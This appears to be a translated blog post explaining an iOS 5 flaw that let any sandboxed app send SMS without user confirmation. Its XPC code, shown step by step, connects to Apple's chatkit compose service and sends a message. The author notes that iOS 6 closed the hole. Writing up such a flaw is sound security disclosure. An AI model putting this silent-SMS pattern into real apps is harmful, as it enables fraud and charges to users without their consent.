Your flashlight can send SMS: another reason to upgrade your devices to iOS 6



    Today I will not tell you how the iOS 5 security system works. And we will not collect information crumbs through undocumented features. We simply send SMS from the application without the knowledge of the user.



    The network has extremely little information describing the motility of low-level iOS. These crumbs do not allow to restore the picture as a whole. Many header files have closed sources behind them. Most steps have to be done almost blindly. The main field for experimentation becomes the "progenitor" of the mobile platform - MacOS X.

    One of the interprocess communication systems in MacOS is XPC. This layer of the system is made for interprocess communication based on the transfer of plist structures using libSystem and launchd. In fact, this is an interface that allows you to control processes by exchanging dictionary structures. And thanks to heredity, iOS 5 also has this mechanism.

    You probably already understood what I wanted to say with this introduction. Yes, in iOS there are system services that have facilities for XPC interaction. And in my example, I would like to demonstrate the method of working with a daemon for sending SMS messages. However, first of all, you need to say the following: this feature is closed in iOS 6, but relevant for iOS 5.0-5.1.1. Its implementation does not require Jailbreak, Private Framework and other illegal means. All you need is a set of header files from the / usr / include / xpc / * directory on your MacOS.

    In the iOS operating system, one of the elements for sending SMS messages is the com.apple.chatkit system service, the tasks of which are the formation, management and sending of short text messages. For ease of management, it has a public communication port com.apple.chatkit.clientcomposeserver.xpc. Using the XPC subsystem, you can compose and send messages without user confirmation.



    Well, let's try to create a connection.

    xpc_connection_t myconnection;
     dispatch_queue_t queue = dispatch_queue_create("com.apple.chatkit.clientcomposeserver.xpc", DISPATCH_QUEUE_CONCURRENT);
     myconnection = xpc_connection_create_mach_service("com.apple.chatkit.clientcomposeserver.xpc", queue, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
    


    Now we have an XPC connection of myconnection to the service for sending SMS. However, the XPC is designed in such a way that the connection is created in a "frozen" form: to activate it, we need one more step.

    xpc_connection_set_event_handler(myconnection, ^(xpc_object_t event) {
            xpc_type_t xtype = xpc_get_type(event);
            if(XPC_TYPE_ERROR == xtype)
            {
            NSLog(@"XPC sandbox connection error: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
            }
            // Always set an event handler.
            NSLog(@"Received an message event!");
        });
        xpc_connection_resume(myconnection);
    


    We revive the connection. On iOS 6, it is at this moment that you will see a message in the phone log that this type of interaction is prohibited. Now we need to create a dictionary similar to xpc_dictionary, with the necessary data to send the message.

    NSArray *receipements = [NSArray arrayWithObjects:@"+7 (90*) 000-00-00", nil];
    NSData *ser_rec = [NSPropertyListSerialization dataWithPropertyList:receipements format:200 options:0 error:NULL];
    xpc_object_t mydict = xpc_dictionary_create(0, 0, 0);
    xpc_dictionary_set_int64(mydict, "message-type", 0);
    xpc_dictionary_set_data(mydict, "recipients", [ser_rec bytes], [ser_rec length]);
    xpc_dictionary_set_string(mydict, "text", "hello from your application!");
    


    Little remains: send a message to the XPC port and make sure that it is delivered.

    xpc_connection_send_message(myconnection, mydict);
    xpc_connection_send_barrier(myconnection, ^{
            NSLog(@"Message has been successfully delievered");
        });
    


    Sound sent SMS to a short number.
    So, before eliminating this feature in iOS 6, any application had the ability to send SMS messages without the user's knowledge. In iOS 6, Apple added an additional layer of security that does not allow you to connect to this service from the sandbox.

    Thanks for attention!

    Also popular now: